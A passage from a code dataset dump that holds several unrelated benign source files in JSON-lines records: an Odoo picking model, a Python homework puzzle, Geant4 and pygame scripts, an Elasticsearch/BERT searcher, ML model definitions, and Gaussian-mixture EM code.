@api.one\n @api.depends('point_printing_id')\n def _compute_is_electronic(self):\n \"\"\"\n Dejar para futuras implementaciones de F.E.\n en este documento.\n :return:\n \"\"\"\n self.is_electronic = False\n\n point_printing_id = fields.Many2one('sri.point.printing', string='Punto de impresión')\n sri_authorization_id = fields.Many2one('sri.authorization', string='Autorización del SRI')\n number = fields.Char('Secuencial', size=9)\n is_electronic = fields.Boolean(string='Es electrónica?', store=True, compute='_compute_is_electronic')\n invoice_id = fields.Many2one('account.invoice', 'Aplicado a factura')\n\n # CARRIER\n carrier_id = fields.Many2one('stock.carrier', 'Transportista')\n documentation_number = fields.Char('Nº Identificación', related='carrier_id.documentation_number', readonly=True)\n transport_plate = fields.Char('Placa de transporte', related='carrier_id.transport_plate', readonly=True)\n","sub_path":"eliterp_stock_referral_guide/models/stok_picking.py","file_name":"stok_picking.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"233256742","text":"\n# 编写程序,计算百钱买百鸡问题。假设公鸡5元一只,母鸡3元一只,小鸡1元三只,现在有100块钱,想买100只鸡,问有多少种买法?\n# 设a为公鸡 b为母鸡 100-a-b为小鸡的数量 count为购买方法次数\nx = 0\ny = 0\ncount = 0\n\nfor x in range(int(100/5)):\n\n for y in range(int(100/3)):\n\n if(5*x+3*y+(100-x-y)/3==100):\n\n print(\"公鸡有\"+str(x)+\"只\"+\" 母鸡有\"+str(y)+\"只\"+\" 小鸡有\"+str((100-x-y))+\"只\")\n\n count=count+1\n\nprint(\"一共有\"+str(count)+\"种买法\")\n\n# 公鸡有0只 母鸡有25只 小鸡有75只\n# 公鸡有4只 母鸡有18只 小鸡有78只\n# 公鸡有8只 母鸡有11只 小鸡有81只\n# 公鸡有12只 母鸡有4只 小鸡有84只\n# 一共有4种买法\n\n","sub_path":"homework4/Group3/hw4_1720372_1.py","file_name":"hw4_1720372_1.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"579749895","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport gam_gate as gam\nimport gam_g4 as g4\nimport math\n\n# Get Nist Material Manager\nn = g4.G4NistManager.Instance()\nprint('Nist manager', n)\n\n# http://geant4-userdoc.web.cern.ch/geant4-userdoc/UsersGuides/ForApplicationDeveloper/html/Appendix/materialNames.html\nmat = n.FindOrBuildMaterial('G4_WATER')\nprint('Mat Water', mat)\nassert mat.GetName() == 'G4_WATER'\ngcm3 = gam.g4_units('g/cm3')\nprint('Density ', mat.GetDensity(), mat.GetDensity() / gcm3)\nassert math.isclose(mat.GetDensity(), gcm3)\nprint('Elements', mat.GetElementVector())\nprint('Nb of elements', mat.GetNumberOfElements())\nassert mat.GetNumberOfElements() == 2\nelements = mat.GetElementVector()\nassert elements[0].GetSymbol() == 'H'\nassert elements[1].GetSymbol() == 'O'\n\neV = gam.g4_units('eV')\nImean = mat.GetIonisation().GetMeanExcitationEnergy()\nprint('I mean = ', Imean / eV, 'eV')\nassert math.isclose(Imean / eV, 78.0)\n\n# Another material\nmat = n.FindOrBuildMaterial('G4_TISSUE-PROPANE')\nprint('Mat 2', mat, mat.GetName())\nN = mat.GetElementVector()[2]\ngmol = gam.g4_units('g/mol')\nprint('N Z', N.GetZ())\nprint('N A', N.GetA() / gmol)\nassert N.GetZ() == 7\nassert math.isclose(N.GetA() / gmol, 14.00676896)\n\n# n.ListMaterials('all')\n\n# simple simulation object\nprint('-' * 80)\nsim = gam.Simulation()\nprint(sim)\n\ngam.test_ok(True)\n","sub_path":"src/test003_G4Material.py","file_name":"test003_G4Material.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"485484160","text":"import sys\nimport pygame\nfrom smile import Ship\ndef run():\n pygame.init()\n screen = pygame.display.set_mode((800, 640))\n pygame.display.set_caption('First game on Python')\n ship = Ship(screen)\n bgcolor = (64, 130, 196)\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n screen.fill(bgcolor)\n ship.blitme()\n pygame.display.flip()\n\ndef main():\n run()\n\nif __name__ == '__main__':\n main()","sub_path":"g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"35650758","text":"import os\nfrom pprint import pprint\n\nfrom bert_serving.client import BertClient\nfrom elasticsearch import Elasticsearch\nfrom flask import Flask, jsonify, render_template, request\n\nclass Searcher:\n \n def __init__(self,search_size,index_name):\n self.search_size = search_size\n os.environ['INDEX_NAME'] = index_name #'jobsearch'\n #print(os.environ['INDEX_NAME'])\n self.index_name = os.environ['INDEX_NAME']\n\n self.bc = BertClient(ip='localhost', output_fmt='list',timeout=1000)\n self.client = Elasticsearch('localhost:9200')\n self.client.cluster.health(wait_for_status='yellow', request_timeout=1)\n #self.count = 0\n \n def search(self,query):\n #query = input(\">>> \")\n #self.count += 1\n query_vector = self.bc.encode([query])[0]\n\n script_query = {\n \"script_score\": {\n \"query\": {\"match_all\": {}},\n \"script\": {\n \"source\": \"cosineSimilarity(params.query_vector, doc['text_vector']) + 1.0\",\n \"params\": {\"query_vector\": query_vector}\n }\n }\n }\n\n response = self.client.search(\n index = self.index_name,\n body={\n \"size\": self.search_size,\n \"query\": script_query,\n \"_source\": {\"includes\": [\"sentenceId\", \"personaId\", \"text\"]}\n }\n )\n #print(query)\n score = response['hits']['hits'][00]['_score']\n persona_block = response['hits']['hits'][00]['_source']\n persona_id =persona_block['personaId']\n script_query2 = {\n \"term\": {\n \"personaId\": str(persona_id)\n }\n }\n\n\n response2 = self.client.search(\n index = self.index_name,\n body={\n \"query\": script_query2,\n \"_source\": {\"includes\": [\"sentenceId\", \"personaId\", \"text\"]}\n }\n )\n #print(score) \n return response2['hits']['hits']#[00]['_source']['text']\n","sub_path":"searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"318173386","text":"_base_ = ['hrnet_w32_coco_512x512.py']\n\nmodel = dict(\n test_cfg=dict(\n multi_scale_score_decrease=1.0,\n nms_dist_thr=0.1,\n max_pool_kernel=9,\n ))\n\nval_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='BottomUpGetImgSize',\n base_length=32,\n test_scale_factor=[0.5, 1, 2]),\n dict(\n type='BottomUpResizeAlign',\n base_length=32,\n transforms=[\n dict(type='ToTensor'),\n dict(\n type='NormalizeTensor',\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n ]),\n dict(\n type='Collect',\n keys=['img'],\n meta_keys=[\n 'image_file', 'aug_data', 'test_scale_factor', 'base_size',\n 'center', 'scale', 'flip_index', 'num_joints', 'skeleton',\n 'image_size', 'heatmap_size'\n ]),\n]\n\ntest_pipeline = val_pipeline\n\ndata = dict(\n val=dict(pipeline=val_pipeline),\n test=dict(pipeline=test_pipeline),\n)\n","sub_path":"PyTorch/built-in/cv/pose_estimation/HRNet_MMPose_for_PyTorch/configs/body/2d_kpt_sview_rgb_img/dekr/coco/hrnet_w32_coco_512x512_multiscale.py","file_name":"hrnet_w32_coco_512x512_multiscale.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"615410739","text":"#!/usr/bin/env python\nimport os;\nimport sys;\nscriptsDir = os.environ.get(\"UTIL_SCRIPTS_DIR\");\nif (scriptsDir is None):\n raise Exception(\"Please set environment variable UTIL_SCRIPTS_DIR\");\nsys.path.insert(0,scriptsDir);\nimport pathSetter\nimport util;\nfrom synthetic import synthetic as sn;\nimport argparse;\n\ndef do(options):\n outputFileName_core = util.addArguments(\"EmptyBackground\", [\n util.ArgumentToAdd(options.seqLength, \"seqLength\")\n ,util.ArgumentToAdd(options.numSeqs, \"numSeqs\")\n ]);\n embedInBackground = sn.EmbedInABackground(\n backgroundGenerator=sn.ZeroOrderBackgroundGenerator(seqLength=options.seqLength) \n , embedders=[]\n );\n sequenceSet = sn.GenerateSequenceNTimes(embedInBackground, options.numSeqs)\n sn.printSequences(outputFileName_core+\".simdata\", sequenceSet, includeFasta=True, includeEmbeddings=True);\n \nif __name__==\"__main__\":\n parser = argparse.ArgumentParser();\n parser.add_argument(\"--seqLength\", type=int, required=True);\n parser.add_argument(\"--numSeqs\", type=int, required=True);\n options = parser.parse_args();\n do(options); \n","sub_path":"synthetic/APIscripts/emptyBackground.py","file_name":"emptyBackground.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"286391878","text":"import numpy as np\nimport time\nfrom numba import jit\n\nclass body:\n def __init__(self,mass, pos0, vel0):\n self.mass = mass/2e30\n self.p0 = pos0\n self.v0 = vel0\n self.G = 4* np.pi**2\n \n def kinetic_energy(self,v):\n K = 0.5*self.mass*np.linalg.norm(v,axis=1)**2\n return K\n \n def potential_energy(self,r,M=1): #M = 1 for the sun\n U = -self.G*M*self.mass/np.linalg.norm(r,axis=1)\n return U\n \n def angular_momentum(self,v,r):\n angmom = np.cross(r,v*self.mass,axis=1)\n return angmom\n \n def make_pos_vec(self,N):\n self.pos_vec = np.zeros((N,3))\n self.pos_vec[0] = self.p0\n\n def make_vel_vec(self,N):\n self.vel_vec = np.zeros((N,3))\n self.vel_vec[0] = self.v0\n\n def make_acc_vec(self,N,a0):\n self.acc_vec = np.zeros((N,3))\n self.acc_vec[0] = a0\n\n \n\ndef system(*args):\n system = []\n for i in args:\n system.append(i)\n \n mass_centre = np.zeros(3)\n for i in system: #finds centreof mass\n mass_centre += i.mass*i.p0\n \n for i in system: # sets center of mass as origin\n i.p0 = i.p0-mass_centre\n \n return system\n\n \nclass solve:\n def __init__(self,system,N,dt):\n self.dt = dt\n self.N = N\n self.system = system\n\n self.G = 4*np.pi**2\n \n for i in self.system:\n i.make_pos_vec(N)\n i.make_vel_vec(N)\n for i in self.system:\n i.make_acc_vec(N,self.acceleration(i,0))\n \n \n def acceleration(self,current,i):\n acc = np.zeros(3)\n\n for j in self.system:\n if j != current:\n r = current.pos_vec[i]-j.pos_vec[i]\n acc -= r*self.G*j.mass/(np.linalg.norm(r)**3)\n return acc\n\n \n def verlet(self):\n dt = self.dt\n dt2 = dt**2\n \n start = time.time()\n for i in range(self.N-1):\n for j in self.system:\n j.pos_vec[i+1] = j.pos_vec[i] + dt*j.vel_vec[i] + 0.5*dt2*j.acc_vec[i]\n for j in self.system:\n j.acc_vec[i+1] = self.acceleration(j,i+1)\n for j in self.system:\n j.vel_vec[i+1] = j.vel_vec[i] + 0.5*(j.acc_vec[i]+j.acc_vec[i+1])*dt\n stop = time.time()\n print(\"Verlet : \",stop-start,\"secs\")\n \n\n\n \nif __name__ == \"__main__\":\n\ta = 2\n \n","sub_path":"project3/python/multiple_body_class.py","file_name":"multiple_body_class.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"555903216","text":"'''\r\nAuthor: Jordan Ott\r\nDescription:\r\n\tCreates network\r\n\tinput_shape: dimension of atari game window\r\n\toutput layer: number of actions available in the game\r\n\t\r\n'''\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Activation, Flatten\r\nfrom keras.layers import Convolution3D, MaxPooling3D\r\nfrom keras.optimizers import Adam\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.layers.convolutional_recurrent import ConvLSTM2D\r\n\r\ndef build_network(num_actions,input_shape):\r\n\tinput_shape = (1,input_shape[0],input_shape[1],input_shape[2])\r\n\tseq = Sequential()\r\n\tseq.add(ConvLSTM2D(nb_filter=40, nb_row=3, nb_col=3,input_shape=input_shape,\r\n\t border_mode='same', return_sequences=True))\r\n\tseq.add(BatchNormalization())\r\n\tseq.add(Dropout(.2))\r\n\t'''\r\n\tseq.add(ConvLSTM2D(nb_filter=40, nb_row=3, nb_col=3,\r\n\t border_mode='same', return_sequences=True))\r\n\tseq.add(BatchNormalization())\r\n\tseq.add(Dropout(.2))\r\n\t'''\r\n\r\n\tseq.add(Convolution3D(nb_filter=1, kernel_dim1=1, kernel_dim2=3,\r\n kernel_dim3=3, activation='sigmoid',\r\n border_mode='same', dim_ordering='tf'))\r\n\r\n\tseq.add(Activation('relu'))\r\n\r\n\tseq.add(Flatten())\r\n\t\r\n\tseq.add(Dropout(.2))\r\n\tseq.add(Dense(num_actions))\r\n\r\n\tseq.compile(loss='binary_crossentropy', optimizer='adadelta',metrics=['accuracy'])\r\n\treturn seq\r\n\r\n\t'''\r\n\tmodel = Sequential()\r\n\tmodel.add(Convolution2D(32, 8, 8, subsample=(4,4), border_mode='same',input_shape=input_shape))\r\n\tmodel.add(Activation('relu'))\r\n\tmodel.add(Convolution2D(64, 4, 4, subsample=(2,2), border_mode='same'))\r\n\tmodel.add(Activation('relu'))\r\n\tmodel.add(Convolution2D(64, 3, 3, subsample=(1,1), border_mode='same'))\r\n\tmodel.add(Activation('relu'))\r\n\tmodel.add(Flatten())\r\n\tmodel.add(Dense(512))\r\n\tmodel.add(Activation('relu'))\r\n\tmodel.add(Dense(num_actions))\r\n\r\n\tadam = Adam(lr=1e-6)\r\n\tmodel.compile(loss='mse',optimizer=adam,metrics=['accuracy'])\r\n\t\r\n\treturn model\r\n'''\r\n","sub_path":"Learning Agent/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"542705875","text":"# ----------------------------------------------------------------------\n# Copyright 2018 Marco Inacio <pythonpackages@marcoinacio.com>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, version 3 of the License.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n# ----------------------------------------------------------------------\n\nimport time\n\nimport numpy as np\nfrom scipy import stats\nfrom sstudy import do_simulation_study\nfrom univariate_htest_db_structure import ResultUVAEHTest, db\nfrom vaecompare import HTest\n\nto_sample = dict(\n distribution=[0],\n no_instances=[1000],\n dissimilarity=[\n # 0.0,\n 0.1,\n ],\n method=[\n 'vaecompare_median',\n # 'vaecompare_mean',\n 'mannwhitneyu',\n 'ks',\n 'ttest',\n ],\n nrefits=[10],\n num_layers=[5],\n)\n\n\ndef sample_filter(distribution,\n no_instances,\n dissimilarity,\n method,\n nrefits,\n num_layers):\n if method[:10] == 'vaecompare':\n return 500\n\n return True\n\n\ndef func(distribution,\n no_instances,\n dissimilarity,\n method,\n nrefits,\n num_layers):\n def data_gen(distribution, size, dissimilarity):\n probs = np.random.random(size)\n res = np.empty(size)\n if distribution == 0:\n for i in range(size):\n if probs[i] < 1 / 3:\n mu = -2. + dissimilarity\n elif probs[i] > 2 / 3:\n mu = 0. + dissimilarity\n else:\n mu = 2. + dissimilarity\n res[i] = stats.norm.rvs(mu)\n\n return res\n\n start_time = time.time()\n y_train0 = data_gen(distribution, no_instances, 0)\n y_train1 = data_gen(distribution, no_instances, dissimilarity)\n\n if method == 'mannwhitneyu':\n htest = stats.mannwhitneyu(y_train0, y_train1,\n alternative='two-sided')\n\n if method == 'ks':\n htest = stats.ks_2samp(y_train0, y_train1)\n\n if method == 'ttest':\n htest = stats.ttest_ind(y_train0, y_train1,\n equal_var=False)\n\n if method[:10] == 'vaecompare':\n averaging = method[11:]\n\n htest = HTest(dataloader_workers=0, verbose=1,\n averaging=averaging,\n num_layers_decoder=num_layers,\n num_layers_encoder=num_layers,\n )\n htest.fit(y_train0, y_train1, 10000,\n nrefits=nrefits,\n )\n\n elapsed_time = time.time() - start_time\n\n return dict(\n pvalue=htest.pvalue,\n elapsed_time=elapsed_time,\n )\n\n\ndo_simulation_study(to_sample, func, db, ResultUVAEHTest,\n max_count=10000, sample_filter=sample_filter)\n","sub_path":"vaecompare-master/univariate_htest_sstudy_do.py","file_name":"univariate_htest_sstudy_do.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"514255433","text":"#########################################################################\n#\n# Copyright 2013 Cloud Sidekick\n# __________________\n#\n# All Rights Reserved.\n#\n# NOTICE: All information contained herein is, and remains\n# the property of Cloud Sidekick and its suppliers,\n# if any. The intellectual and technical concepts contained\n# herein are proprietary to Cloud Sidekick\n# and its suppliers and may be covered by U.S. and Foreign Patents,\n# patents in process, and are protected by trade secret or copyright law.\n# Dissemination of this information or reproduction of this material\n# is strictly forbidden unless prior written permission is obtained\n# from Cloud Sidekick.\n#\n#########################################################################\n\nimport catoclient.catocommand\nfrom catoclient.param import Param\n\n\nclass ImportPipeline(catoclient.catocommand.CatoCommand):\n\n Description = \"\"\"Imports a Pipeline definition from a JSON document.\n\nReturns a Pipeline Object.\"\"\"\n\n API = 'import_pipeline'\n Examples = ''''''\n Options = [Param(name='backupfile', short_name='b', long_name='backupfile',\n optional=False, ptype='string',\n doc='A JSON document formatted as a complete CSK Pipeline backup.'),\n Param(name='overwrite', short_name='o', long_name='overwrite',\n optional=True, ptype='string',\n doc=\"\"\"Valid values: pipeline|phases|all|none (default).\"\"\")\n ]\n\n def main(self):\n import os\n\n self.backup = None\n if self.backupfile:\n fn = os.path.expanduser(self.backupfile)\n with open(fn, 'r') as f_in:\n if not f_in:\n print(\"Unable to open file [%s].\" % fn)\n self.backup = f_in.read()\n\n results = self.call_api(self.API, ['backup', 'overwrite'])\n print(results)\n","sub_path":"maestroclient/commands/importpipeline.py","file_name":"importpipeline.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"327231870","text":"# Create your classes here\n\nclass Student(object):\n\n def __init__(self, first_name, last_name, address):\n self.first_name = first_name\n self.last_name = last_name\n self.address = address\n\n\nclass Question(object):\n\n def __init__(self, question, answer):\n self.question = question\n self.answer = answer\n\n def ask_and_evaluate(self):\n print(self.question) \n answer = input(\"Answer: \") \n\n return answer == self.answer\n\n\nclass Evaluation(object):\n\n def __init__(self, name):\n self.name = name\n self.questions = []\n\n def add_question(self, question):\n self.questions.append(question) \n\n\nclass Exam(Evaluation):\n\n def administer(self):\n counter = 0\n score = 0\n\n for question in self.questions:\n is_correct = question.ask_and_evaluate()\n counter += 1\n if is_correct:\n score += 1\n\n print(\"Your score is {}\".format(100 * score / counter))\n return (100 * score / counter) \n # print(\"Your score is {}\".format(100 * score / len(self.questions)))\n\n\nclass Quiz(Evaluation):\n\n def administer(self):\n counter = 0\n score = 0\n\n for question in self.questions:\n is_correct = question.ask_and_evaluate()\n counter += 1\n if is_correct:\n score += 1\n\n if score / counter >= 0.5:\n print(\"You passed the quiz!\")\n return 1\n print(\"Sorry - you failed the quiz\")\n return 0\n\n\nclass StudentExam:\n score = float()\n\n def __init__(self, student, exam):\n self.student = student\n self.exam = exam\n\n\n def take_test(self):\n self.score = self.exam.administer()\n\n\ndef example():\n midterm = Quiz(\"midterm\")\n question1 = Question(\"What color is the sky?\", \"Blue\")\n question2 = Question(\"Whats your favorite coding language?\", \"Python\")\n midterm.add_question(question1)\n midterm.add_question(question2)\n jane = Student(\"Jane\", \"Pain\", \"123 street\")\n jane_exam = StudentExam(jane, midterm)\n jane_exam.take_test()\n\n","sub_path":"oo.py","file_name":"oo.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"589477393","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nclass KmeansCluster:\n \"\"\"\n Attribute:\n K: the number of cluster\n centroids: the centroid of each cluster, will be an array of K*X.shape[1]\n clusters: the cluster label for each datapoints\n Method:\n initialize_cluster_centroids: randomly pick K datapoints as cluster centroid\n cluster_assign: assign each datapoint to the nearest centroid\n calculate_centroids: recompute each cluster centroids due to its cluster label\n check_converge:check if the algorithm has converge\n \"\"\"\n def __initialize_cluster_centroids(self,X):\n #We set cluster centroids as an array of K*X.shape[1]\n shuffled_pos=np.random.permutation(X.shape[0])\n pos=shuffled_pos[:self.K]\n self.centroids=X[pos,:]\n def cluster_assign(self,X):\n distance_to_centroids=np.zeros((X.shape[0],self.centroids.shape[0]))\n #distance_to_centroids will stored the distance from each datapoint to each centroid\n #the position (i,j) will stored the distance from datapoint i to centroid j\n for i in range(self.centroids.shape[0]):\n centroid=self.centroids[i] #the current centroids\n X_distance=(X-centroid)**2 #substract and square\n X_distance=np.sum(X_distance,axis=1) #calculate the square distance to the centroid\n distance_to_centroids[:,i]=X_distance #assign it to column i\n return np.argmin(distance_to_centroids,axis=1)\n def __calculate_centroids(self,X):\n self.centroids=np.zeros((self.K,X.shape[1]))\n for i in range(self.K):\n self.centroids[i]=np.mean(X[self.clusters==i],axis=0)\n def __check_converge(self,last_centroids):\n #Check if the algorithm has converged\n distance=np.sum((self.centroids-last_centroids)**2)\n if(distance<1e-6):return True\n else: return False\n def __costFunction(self,X):\n X_recover=np.zeros((X.shape[0],X.shape[1]))\n for i in range(self.K):\n X_recover[self.clusters==i]=self.centroids[i]\n costEachpoint=np.sqrt(np.sum((X-X_recover)**2,axis=1)) #distance of each point to its centroids\n cost=np.sum(costEachpoint)/X.shape[0]\n return cost\n def Segmentation(self,X,K,max_iteration=2000,print_loss=True):\n self.clusters=None\n self.K=K\n self.centroids=None\n self.__initialize_cluster_centroids(X)\n for i in range(max_iteration):\n last_centroids=self.centroids\n self.clusters=self.cluster_assign(X)\n self.__calculate_centroids(X)\n if(print_loss):print('Loss at iteration '+str(i)+': '+str(self.__costFunction(X)))\n if(self.__check_converge(last_centroids)):break\n\ndef initialize(X,n_clusters,n_dimensions):\n '''\n initialize the lambd, mu and sigma for mixture of gaussian.\n Parameters:\n X:data\n n_cluster: number of clusters\n n_dimensions: number of dimensions\n '''\n kmeans=KmeansCluster()\n kmeans.Segmentation(X,n_clusters)\n lambd=np.ones((n_clusters,))/n_clusters\n mu=kmeans.centroids\n print('Cluster centroid after applying kmeans: '+str(mu))\n sigma=np.array([np.eye(n_dimensions) for i in range(n_clusters)])\n return lambd,mu,sigma\n\ndef gaussian_function(X,mu,sigma):\n '''\n Calculate the gaussian distribution, given data x, mean mu and covariance sigma.\n X: 2D array, in the shape of (n_samples,n_dimensions)\n mu: 1D array, represents the mean, in the shape of (n_dimensions,)\n sigma: 2D array, represents the covariance, in the shape of (n_dimensions,n_dimensions)\n '''\n mu=mu.reshape((1,mu.shape[0]))\n det=np.linalg.det(2*np.pi*sigma) #determinant\n det=det**(-0.5)\n inv_sigma=np.linalg.inv(sigma) #inverse matrix of sigma\n exp=np.exp((-0.5*np.dot((X-mu),inv_sigma.dot((X-mu).T))))\n return det*np.array([exp[i,i] for i in range(X.shape[0])])\n\ndef e_step(X,lambd,mu,sigma):\n '''\n E step in EM algorithm\n X: data X\n lambd: lambd parameters, 1D numpy array\n mu: mu parameters, 2D numpy array\n sigma: sigma parameters, 3D numpy array \n '''\n r=np.zeros((X.shape[0],lambd.shape[0]))\n for i in range(lambd.shape[0]):\n r[:,i]=gaussian_function(X,mu[i],sigma[i])\n lambd=lambd.reshape((1,lambd.shape[0]))\n r=r*lambd\n return r/np.reshape(np.sum(r,axis=1),(X.shape[0],1))\n\ndef m_step(X,r):\n '''\n Update parameters via m_step.\n Parameters:\n X: data, in shape of (n_samples,n_dimensions)\n '''\n lambd=np.zeros((r.shape[1],))\n mu=np.zeros((r.shape[1],X.shape[1]))\n sigma=np.zeros((r.shape[1],X.shape[1],X.shape[1]))\n for k in range(r.shape[1]):\n lambd[k]=np.sum(r[:,k])/r.sum()\n mu[k]=np.sum(r[:,k].reshape((X.shape[0],1))*X,axis=0)/np.sum(r[:,k])\n new_mu=mu[k].reshape((1,X.shape[1]))\n sigma[k]=(X-new_mu).T.dot(r[:,k].reshape(X.shape[0],1)*(X-new_mu))/np.sum(r[:,k])\n return lambd,mu,sigma\n\ndef update(n_iterations,X,n_clusters=3):\n '''\n Update the parameters for EM algorithm\n Parameters:\n n_iterations: number of maximum iterations\n X: data X\n '''\n log_likelihood=[]\n lambd,mu,sigma=initialize(X,n_clusters,X.shape[1])\n last_lambd=lambd\n last_mu=mu\n last_sigma=sigma\n for i in range(n_iterations):\n print('Iteration {}'.format(i))\n r=e_step(X,lambd,mu,sigma)\n lambd,mu,sigma=m_step(X,r)\n diff=np.sum(lambd-last_lambd)+np.sum(last_mu-mu)+np.sum(last_sigma-sigma)\n print(diff)\n densities=prob_densities(X,last_lambd,last_mu,last_sigma)\n log_likelihood.append(np.sum(np.log(densities)))\n last_lambd=lambd;last_mu=mu;last_sigma=sigma\n if(np.abs(diff)<1e-8):break\n print('Number of iteration {}'.format(i))\n return lambd,mu,sigma,log_likelihood\n\n'''lambd,mu,sigma=update(1000,X)\nprint('After applying EM: '+str(lambd))\nprint('After applying EM: '+str(mu))\nprint(sigma)'''\n\ndef cluster_assigned(X,lambd,mu,sigma):\n '''\n Assigned the cluster label to each data point of X\n '''\n cluster_id=np.argmax(e_step(X,lambd,mu,sigma),axis=1)\n return cluster_id\n\n'''cluster_id=cluster_assigned(X,lambd,mu,sigma)\nplt.plot(X[cluster_id==0,0],X[cluster_id==0,1],'ro')\nplt.plot(X[cluster_id==1,0],X[cluster_id==1,1],'b^')\nplt.plot(X[cluster_id==2,0],X[cluster_id==2,1],'gs')\nplt.show()'''\n\ndef make_data(minx,maxx,miny,maxy,n=100):\n '''\n Make the data for contour plot.\n Parameters:\n minx,maxx,miny,maxy: the minimum and maximum value in the x and y axis\n n: number of datapoint along each axis\n '''\n x0=np.linspace(minx,maxx,n)\n x1=np.linspace(miny,maxy,n)\n xx0,xx1=np.meshgrid(x0,x1)\n x0_ravel=np.ravel(xx0)\n x1_ravel=np.ravel(xx1)\n X_data=np.array([x0_ravel,x1_ravel]).T\n return xx0,xx1,X_data\n\ndef prob_densities(X,lambd,mu,sigma):\n '''\n Calculate the prob density for each data point\n Paramters:\n X: list of data point\n mu: mean\n sigma: covariance\n '''\n r=np.zeros((X.shape[0],mu.shape[0]))\n for i in range(r.shape[1]):\n r[:,i]=gaussian_function(X,mu[i],sigma[i])\n lambd=lambd.reshape(1,lambd.shape[0])\n return np.sum(lambd*r,axis=1)\n'''r1=x1\nr2=x2\nr3=x3\nx0=np.linspace(0,4,100)\nx1=np.linspace(0,4,100)\nxx0,xx1=np.meshgrid(x0,x1)\nx0_ravel=np.ravel(xx0)\nx1_ravel=np.ravel(xx1)\nX_data=np.array([x0_ravel,x1_ravel]).T\ndensities=prob_densities(X_data,lambd,mu,sigma)\ndensities=densities.reshape(xx0.shape)\nplt.contour(xx0,xx1,densities)\nplt.plot(r1[:,0],r1[:,1],'ro')\n\nx0=np.linspace(6,10,100)\nx1=np.linspace(1,5,100)\nxx0,xx1=np.meshgrid(x0,x1)\nx0_ravel=np.ravel(xx0)\nx1_ravel=np.ravel(xx1)\nX_data=np.array([x0_ravel,x1_ravel]).T\ndensities=prob_densities(X_data,lambd,mu,sigma)\ndensities=densities.reshape(xx0.shape)\nplt.contour(xx0,xx1,densities)\nplt.plot(r2[:,0],r2[:,1],'b^')\n\nx0=np.linspace(1,5,100)\nx1=np.linspace(4,8,100)\nxx0,xx1=np.meshgrid(x0,x1)\nx0_ravel=np.ravel(xx0)\nx1_ravel=np.ravel(xx1)\nX_data=np.array([x0_ravel,x1_ravel]).T\ndensities=prob_densities(X_data,lambd,mu,sigma)\ndensities=densities.reshape(xx0.shape)\nplt.contour(xx0,xx1,densities)\nplt.plot(r3[:,0],r3[:,1],'go')\nplt.xlim(0,10)\nplt.ylim(0,10)\nplt.show()'''\n","sub_path":"EM/em.py","file_name":"em.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"291981973","text":"import pytest\n\nfrom ..average_and_percentage import average\n\n\n@pytest.mark.parametrize('a, b, c, d, expected', [\n (10, 10, 10, 10, 10),\n (20, 20, 20, 20, 20),\n (100, 100, 100, 100, 100)\n])\ndef test_average(a, b, c, d, expected):\n actual = average(a, b, c, d)\n assert actual == expected\n","sub_path":"arithmetic_03/test/test_average_and_percentage.py","file_name":"test_average_and_percentage.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"53788556","text":"import threading\nimport os\nimport sys\nimport zencad\nimport signal\nimport psutil\nimport zencad.gui.signal_os\n\nfrom zencad.util import print_to_stderr\nfrom threading import Timer\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\n__RETRANSLER_TRACE__ = False\n\ndef run_with_timeout(timeout, default, f, *args, **kwargs):\n\tif not timeout:\n\t\treturn f(*args, **kwargs)\n\ttry:\n\t\ttimeout_timer = Timer(timeout, threading.interrupt_main)\n\t\ttimeout_timer.start()\n\t\tresult = f(*args, **kwargs)\n\t\treturn result\n\texcept KeyboardInterrupt:\n\t\treturn default\n\tfinally:\n\t\ttimeout_timer.cancel()\n\nclass console_retransler(QThread):\n\tdef 